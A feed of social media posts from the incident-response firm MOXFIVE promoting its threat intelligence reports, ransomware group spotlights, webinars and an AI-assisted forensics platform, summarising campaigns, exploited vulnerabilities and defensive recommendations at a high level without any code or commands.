MOXFIVE

MOXFIVE just published a Threat Actor Alert on TeamPCP's active software supply chain campaign. LiteLLM versions 1.82.7 and 1.82.8 on PyPI contain a malicious payload, the latest development in a campaign that has been running since March 19, hitting Trivy, GitHub Actions, Docker Hub, npm, and Checkmarx KICS before reaching PyPI. 🔸 March 19: Trivy compromised, 10,000+ CI/CD pipelines exposed 🔸 March 20: Stolen npm tokens seeded CanisterWorm across 64+ packages 🔸 March 22: Malicious Trivy Docker images pushed directly to Docker Hub 🔸 March 23: Checkmarx KICS GitHub Action tags hijacked 🔸 March 24: LiteLLM 1.82.7 and 1.82.8 published to PyPI with a malicious payload The full report covers the complete campaign timeline and includes resilience recommendations for organizations that may have been exposed. Read the full report: bit.ly/4takNBY Have questions or need help responding? Reach out to our team at incident@moxfive.com or 833-568-6695. #SupplyChainSecurity #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TeamPCP #LiteLLM #Trivy #Checkmarx

Business email compromise is much more than just a phishing problem. BEC and funds transfer fraud remain among the most persistent and costly eCrime threats facing businesses today. The attacks are sophisticated. The financial and legal fallout is real. And most organizations aren't as prepared as they think. That's why we're bringing together experts for a live panel webinar built around one goal: making sure you know exactly what to do when it matters most. Join Lee Trotter, Michael Brunetti, Kim Detwiler and Melissa Sachs on Wednesday, April 8th at 2pm ET and learn more about: 🔸 The current BEC threat landscape — what's evolved and what defenders need to know 🔸 Forensic investigation methodology and key milestones 🔸 Getting maximum value from your privacy counsel partnership 🔸 Post-investigation data mining — efficiencies and pitfalls 🔸 Real-world case studies + live Q&A Whether you're in security, legal, compliance, or risk — this is one you don't want to miss. Register Today >> bit.ly/4uIsgcX Questions? Contact us at incident@moxfive.com or 833-568-6695. #cybersecurity #incidentresponse #ir #dfir #BECs #FTF #eCrime

MOXFIVE Monthly Insights are out today! February marked a sharp escalation in the cyber threat environment. The strikes against Iran on February 28 drove an immediate surge in Iranian-aligned cyber activity, with state-sponsored intrusions confirmed on US networks and US companies experiencing destructive attacks resulting in system wipes. bit.ly/3NIhp28 Key Findings: 🔸 Iranian Cyber Threat Landscape: State-sponsored groups including MuddyWater established access on US networks before the conflict escalated, while hacktivist groups launched coordinated DDoS, defacement, and data breach campaigns targeting US, Gulf, and allied organizations. Confirmed destructive attacks against US enterprises show the threat extends well beyond the region. 🔸 Ransomware Remained High: Qilin led for the second consecutive month, with Cl0p continuing its Oracle E-Business Suite exploitation campaign. Play, Akira, and DragonForce were all active across multiple industries, while data extortion groups ShinyHunters and World Leaks continued operations centered on theft and extortion rather than encryption. 🔸 Critical Vulnerabilities: Active exploitation was confirmed across remote access platforms, email infrastructure, and virtualization environments, including flaws in BeyondTrust remote access products, SmarterMail, and VMware ESXi systems linked to ransomware campaigns. 🔸 Most Impacted Industries: Technology and Financial organizations saw the highest impact in February, followed by Healthcare, Manufacturing and Production, and Construction and Engineering. 🔸 Defending Against Disruptive and Destructive Threats: When the threat includes wiper malware and destructive attacks, prevention alone is not enough. Patched edge devices, hardened identities, verified backups, and no default credentials on OT systems are the foundation. Business resilience and operational continuity planning determine how quickly organizations recover when prevention falls short. Read the full February report at bit.ly/3NIhp28 for detailed analysis on Iranian threat actors, active ransomware operations, exploitation trends, and resilience controls. #ransomware #incidentresponse #ir #threatintelligence #threatintel #cybersecurity #Qilin #Akira #Play #DragonForce #Cl0p #Hacktivist #MuddyWater #Handala #OpIsrael #CottonSandstorm #zpentest #CyberAv3ngers #OilRig #APT33 #Agrius

Our latest MOXFIVE Threat Actor Spotlight is out today! Since emerging in August 2025, The Gentlemen ransomware operation has listed more than 200 victims on its data leak site, with January and February alone accounting for more than half of all posted victims. From MOXFIVE's experience, this group is methodical. They come in through compromised credentials or exploited internet-facing services, conduct targeted reconnaissance, and deploy ransomware domain-wide via Group Policy for maximum impact. A few things that set them apart: 🔸 Custom BYOVD defense evasion using ThrottleStop.sys (CVE-2025-7771) to terminate security tooling at the kernel level. 🔸 Variants for Windows, Linux, and ESXi, with encryption observed at both the hypervisor and OS level. 🔸 Data exfiltration before encryption, paired with shadow copy deletion and event log clearing to limit recovery options. 🔸 Domain-wide payload distribution via NETLOGON and SYSVOL. 🔸 Manufacturing and production organizations have been hit hardest, though targeting spans technology, financial services, healthcare, and education across across multiple regions. Read the full report: bit.ly/4bmUwdv If your organization has been impacted or you have questions about The Gentlemen or other threat actors, reach out to our team at incident@moxfive.com or 833-568-6695. #Ransomware #ThreatIntelligence #IncidentResponse #Cybersecurity #IR #TheGentlemen #RaaS

We're so honored to be named a finalist for both Cyber Insurance Incident Response Provider and Cyber Security Consulting Services Provider of the Year in the Intelligent Insurer Cyber Insurance Awards! Congratulations to all the finalists! Check out the full list at bit.ly/45Xe1Xe. #CyberInsuranceAwardsUSA #cyberinsurance #incidentresponse #ir #cybersecurity

January showed steady ransomware pressure, with a modest decline from December's volume. Established groups exploited familiar vulnerabilities while social engineering techniques continued to prove effective as initial access vectors. 𝗞𝗲𝘆 𝗙𝗶𝗻𝗱𝗶𝗻𝗴𝘀: 🔸 𝗔𝗰𝘁𝗶𝘃𝗲 𝗧𝗵𝗿𝗲𝗮𝘁𝘀: Qilin led deployment activity, followed by Sinobi and Akira. These RaaS operations maintained consistent pressure across Manufacturing and Production (most impacted), Technology, and Healthcare sectors. 🔸 𝗖𝗿𝗶𝘁𝗶𝗰𝗮𝗹 𝗘𝘅𝗽𝗹𝗼𝗶𝘁𝘀: APT28 weaponized a Microsoft Office security feature bypass (CVE-2026-21509) in espionage campaigns. Critical vulnerabilities in Oracle WebLogic and Ivanti Endpoint Manager Mobile both saw exploitation following disclosure, with mass scanning observed after public PoC release. 🔸 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅 𝗦𝗼𝗰𝗶𝗮𝗹 𝗘𝗻𝗴𝗶𝗻𝗲𝗲𝗿𝗶𝗻𝗴: MOXFIVE responded to several cases involving ClickFix—a technique that manipulates users into executing malicious PowerShell commands by impersonating legitimate system prompts. ClickFix succeeds because it exploits user behavior, with variant like CrashFix that deliberately crash browsers before presenting fake recovery instructions. Users see what appears to be a legitimate system prompt and follow instructions that compromise their systems. 🔸 𝗗𝗲𝗳𝗲𝗻𝗱𝗶𝗻𝗴 𝗔𝗴𝗮𝗶𝗻𝘀𝘁 𝗖𝗹𝗶𝗰𝗸𝗙𝗶𝘅: User training remains critical—legitimate sites never ask users to paste commands into Run dialogs or PowerShell consoles. Combine awareness with restricted PowerShell execution, EDR command-line monitoring, and email gateway filtering for HTML attachments. Read the full January report for detailed analysis on ClickFix campaigns, exploitation trends, and defense controls. bit.ly/4rZnvd2 Contact our team at incident@moxfive.com or 833-568-6695. #Cybersecurity #Ransomware #SocialEngineering #ThreatIntelligence #IncidentResponse #Akira #Qilin #Sinobi

MOXFIVE's latest Threat Actor Spotlight dives into LockBit 5.0 and the operation shows no signs of slowing down. bit.ly/4rv32wg We've responded to recent incidents where LockBit 5.0 was deployed. Operators are pushing a refreshed leak site, recruiting affiliates with structured program rules, and marketing tooling built for scale across Windows, ESXi, and Linux environments. 🔸 The Scale of Activity Over the last two months, postings on the LockBit 5.0 leak site include an estimated 100 victims. Targeting spans Technology, Healthcare, Construction, Financial Services, and Manufacturing, with the United States accounting for roughly 23% of victims, followed by Brazil, Italy, Germany, and Mexico. 🔸 Resilience Through Disruption The operation survived law enforcement Operation Cronos in 2024 and continued releasing new versions, including LockBit 4.0 ("Green") and now 5.0. The affiliate model lowers friction for threat actors to adopt the ransomware, which means repeated deployments across industries and regions. 🔸 What's in the Report Our new Threat Actor Spotlight breaks down LockBit's evolution, what operators advertise in their affiliate materials, what we've observed in recent engagements, and where LockBit 5.0 is being deployed. We also cover the controls that reduce blast radius when affiliates gain initial access. Read the full report: bit.ly/4rv32wg #ThreatIntelligence #Ransomware #LockBit #IncidentResponse #Cybersecurity #IR

Register today for our next MOXFIVE Quarterly Ransomware Briefing on Wed. Feb 18th! Join Michael Rogers (@ANC13NT ), Justin Boncaldo, and Ted Samuels for a look into the most active threat actors in 2025 including real-world case studies along with emerging threats and what to expect for 2026. bit.ly/4rlNN8X

Innovation has always driven us at MOXFIVE and today we’re changing how forensic investigations work with the launch of our Agentic Forensics Platform! Combining AI agents with expert validation by our team allows us to deliver forensic analysis faster than traditional methods without sacrificing any of the rigor our clients depend on. What makes this different: We built this system from the ground up for production forensic work, not prototyped with off-the-shelf integrations. AI agents continuously collect artifacts, correlate activity across thousands of systems, and construct timelines. Human experts provide real-time validation and apply judgment to the complex, ambiguous questions that define every investigation. Why now: The threat landscape is evolving rapidly. Anthropic recently disclosed the first AI-orchestrated cyber espionage campaign where attackers used agentic AI to perform up to 90% of a sophisticated intrusion. Their guidance was clear: security teams need to experiment with AI for defense in areas like incident response. This is that defensive application. For organizations in crisis, this means predictable outcomes when timing matters most: faster analysis, clearer timelines, and findings that hold up to scrutiny. Learn more about our agentic forensics platform at moxfive.ai Read the press release >> bit.ly/4a0mZEd #Cybersecurity #IncidentResponse #AI #Ransomware #DFIR #Forensics #IR

December closed out 2025 as one of the most active months of the year for ransomware activity. Our latest MOXFIVE Monthly Insights report highlights critical trends organizations need to understand heading into the new year! bit.ly/49N3r66 Key Findings: 🔸 Active Threats: Qilin and Akira continued their dominance, together accounting for over 1,500 victims posted to leak sites in 2025. LockBit 5.0 activity surged with enhanced evasion capabilities and a redesigned affiliate panel, posting over 80 victims in December alone. 🔸 Exploitation Wave: Edge networking equipment became a prime target with critical vulnerabilities in Gladinet CentreStack, Fortinet FortiCloud SSO, and WatchGuard Fireware OS all actively exploited in December. 🔸 Industry Impact: Manufacturing and Production remained the most targeted sector followed by Construction & Engineering and Technology. 🔸 LockBit's Persistence: Despite law enforcement disruption in early 2024, LockBit operators launched version 5.0 in September with a modular architecture and improved stealth capabilities—demonstrating how established operations can maintain continuity even after significant infrastructure takedowns. Read the full December report for detailed analysis on vulnerabilities, threat actor TTPs, and resilience controls. bit.ly/49N3r66 Have questions or need help strengthening your ransomware defenses? Contact our team at incident@moxfive.com or 833-568-6695. #Cybersecurity #Ransomware #ThreatIntelligence #IncidentResponse #InfoSec #Qilin #Akira #LockBit #IR

Our team at MOXFIVE just released our 2025 Ransomware Review, and the trends are clear: ransomware operators continue to refine their tactics with devastating efficiency. Key takeaways from the year: Top Threats: 🔸 Akira led ransomware activity, followed by Qilin, Play, INC, and Cl0p. 🔸 RaaS operations dominated the landscape 🔸 Groups like Scattered Spider expanded their social engineering campaigns Initial Access: 🔸 VPN access remained the most common entry point 🔸 Exploitation of internet-facing vulnerabilities was second most common 🔸 Remote access security continues to be a critical weak point Exploitation Waves: We tracked significant campaigns throughout the year, from Ivanti Connect Secure in Q1 to Oracle E-Business Suite in Q3/Q4. Zero-day exploitation and delayed patching continue to create windows of opportunity for threat actors. Heading into 2026, the fundamentals haven't changed: remote access security, timely patching, and identity protection remain essential. The threat landscape favors affiliate-driven operations with reliable access methods. Read the full report at bit.ly/3Lh5uHx for detailed analysis on ransomware operations, initial access trends, and exploited vulnerabilities throughout 2025. Need help strengthening your ransomware resilience? Contact our team at incident@moxfive.com or 833-568-6695. #Cybersecurity #Ransomware #ThreatIntelligence #IncidentResponse #Akira #Qilin #Play #IncRansom #Cl0p #ScatteredSpider #VPN #RemoteAccess #ThreatIntel #EDR #CyberResilience #RaaS

Happy Holidays from the MOXFIVE Team! Thank you to everyone we worked with this year - we always appreciate you putting your trust in our team and look forward to a fantastic 2026!

Our latest MOXFIVE Monthly Insights for November is now available! Akira continued to be one of the most frequently deployed variants, while Cl0p’s Oracle E-Business Suite extortion campaign became increasingly visible through data leak site postings. Overall volume dipped slightly from October but remained elevated compared to earlier months. Key Threats & Trends This Month: 🔸 Cl0p Oracle EBS campaign: Zero-day exploitation continues to drive large-scale extortion, with 100+ organizations added to leak sites in recent weeks. 🔸 CentreStack RCE (CVE-2025-30406): Actively exploited months after disclosure, including deployments of Warlock ransomware via internet-facing file-sharing portals. 🔸 React2Shell (CVE-2025-55182): Newly disclosed React Server Components RCE triggered immediate scanning and automated exploitation attempts. 🔸 RaaS dominance: Affiliate-driven ransomware operations remain a primary driver of volume, with credential-based and remote-access intrusions leading the way. Resilience Takeaway: Unpatched, internet-facing collaboration and file-sharing services continue to present a direct path to ransomware and extortion. Strong patch management, MFA enforcement, EDR coverage, reduced exposure, and validated backups remain essential. Read the full November report: bit.ly/48VJI3K #cybersecurity #ransomware #IncidentResponse #IR #ThreatIntel #ThreatIntelligence #Cl0p #Akira #CentreStack #React2Shell #RaaS #Warlock #Qilin #Play #IncRansom

This month our MOXFIVE Threat Actor Spotlight focuses on ShinySp1d3r, a ransomware-as-a-service operation being developed and promoted by the Scattered LAPSUS$ Hunters Alliance. Combining the tradecraft of Scattered Spider, LAPSUS$, and ShinyHunters, the alliance has the capability to coordinate data theft and extortion operations at scale, raising the potential impact of any future ShinySp1d3r deployment. What we're seeing: 🔸 SLSH is promoting a developing ShinySp1d3r RaaS with a modular encryptor and planned Windows, Linux, and VMware ESXi variants. 🔸 Current communication from the group is through Telegram channels which are a mix of claims, taunts, and threats that still need to be weighed against technical evidence. 🔸 The alliance has already launched a separate successful extortion campaign targeting Salesforce data and posted over 40 victims on a joint leak site. Why it matters: 🔸 Public alignment of these three groups - sharing leak sites and messaging - is a notable and concerning escalation. 🔸 A mature ShinySp1d3r RaaS could quickly become a high-impact ransomware threat as we enter 2026. Read the full Threat Actor Spotlight >> bit.ly/3KETsHu #ransomware #ShinySp1d3r #RaaS #ScatteredSpider #LAPSUS$ #ShinyHunters #incidentresponse #IR #cybersecurity #threatintel #threatintelligence

Ransomware activity surged in October, driven by aggressive Qilin deployments and steady operations from Akira, Inc, and Play. New variants—including Tengu, Genesis, Radiant, and Kryptos—also entered the landscape, each launching leak sites and posting victims. We also saw active exploitation of major vulnerabilities, including the Oracle E-Business Suite zero-day (CVE-2025-61882) and Fortra GoAnywhere MFT (CVE-2025-10035), both used in extortion-focused campaigns by Cl0p and Medusa respectively. Manufacturing, Healthcare, Technology, and Retail remained top targets as threat actors continued to pursue high-impact, interconnected environments. As attacker timelines shrink with AI-driven automation, resilience fundamentals matter more than ever. We recommend the following End of Year Priorities: 🔸 Validate EDR coverage & identity log completeness 🔸 Complete at least one full backup restoration test 🔸 Patch exposed systems & remove unnecessary access 🔸 Enforce MFA on all privileged & remote pathways 🔸 Conduct a focused ransomware or identity compromise tabletop Read the full October Insights at bit.ly/4866eGx to see what we’re watching, the top playbooks to have ready, and how MOXFIVE helps teams strengthen resilience across modern enterprise environments. #ransomware #Akira #Play #IncRansom #Qilin #Cl0p #Medusa #Oracle #ZeroDay #Fortra #EDR #MDR #Tengu #Kryptos #Genesis #Radiant #MFA #Backups #Cybersecurity #IncidentResponse #ThreatIntelligence #ThreatIntel #IR #DFIR

If you missed our Quarterly Ransomware briefing yesterday, the replay is now available! bit.ly/47shI8l Michael Rogers (@ANC13NT), John Beers, Dylan Duncan, and Britton Manahan covered the most significant ransomware developments from Q3 including recent exploits of SonicWall and Oracle vulnerabilities by Akira and Cl0p/Graceful Spider. We also shared one of the cool ways our forensics experts can gather key artifacts using Remote Desktop Protocol (RDP) bitmap cache files to build visual evidence of actions performed by threat actors. #ransomware #threatintel #threatintelligence #ir #Akira #Cl0p #GracefulSpider #cybersecurity #incidentresponse

Since first appearing in September 2024, SafePay has grown into a prolific ransomware operation with its leak site listing 300+ victims. MOXFIVE’s latest Threat Actor Spotlight examines how this group operates, who they target, and practical steps organizations can take to reduce risk. Key takeaways: 🔸 Targeting: Technology and manufacturing organizations are the most impacted, followed by education, retail/hospitality, and healthcare. 🔸 Geography: The U.S. accounts for the largest share of victims; Germany, Canada, the U.K., and Australia have also seen activity. 🔸 Initial access: Compromised credentials, exposed RDP endpoints, and abuse of VPN/edge devices are primary entry vectors. 🔸 Tactics: Double-extortion—data is staged, compressed, exfiltrated, then systems are encrypted. Volume shadow copies are often deleted and leak-site publication used to escalate pressure. 🔸 Tradecraft: A blend of native Windows utilities, open-source scripts, commodity tooling, and a bespoke encryptor—emphasis on automation, credential reuse, and artifact cleanup. If your organization relies on remote access or third-party connections, SafePay’s activity underscores why strong credential hygiene, segmented remote access, proactive detection, and tested recovery plans are essential. Read the full MOXFIVE Threat Actor Spotlight >> bit.ly/4qGpBib #Ransomware #ThreatIntelligence #CyberSecurity #IncidentResponse #SafePay #ThreatIntel #IR

NetDiligence Philadelphia sessions are now available online! Check out “The Evolution & Innovation of Top Security Controls” — a great discussion with Michael Rogers @ANC13NT and industry leaders on how top organizations are evolving their security strategies to stay ahead of ever-changing cyber threats. Watch now >> bit.ly/4oCztrm #cybersecurity #securitycontrols #incidentresponse #ir #cyberresilience

Join us on Wednesday, Nov. 5th for our Q3 Quarterly Ransomware Briefing! In addition to ransomware trends from Q3 and resilience initiatives to think about for Q4, we’ve got a great segment sharing one of the cool ways our Forensics team can reveal critical evidence and literally see things from the eyes of the hacker during an investigation. Register today! bit.ly/3WjDd4T #ransomware #incidentresponse #ir #cybersecurity #cyberinsurance #threatintelligence #threatintel #dfir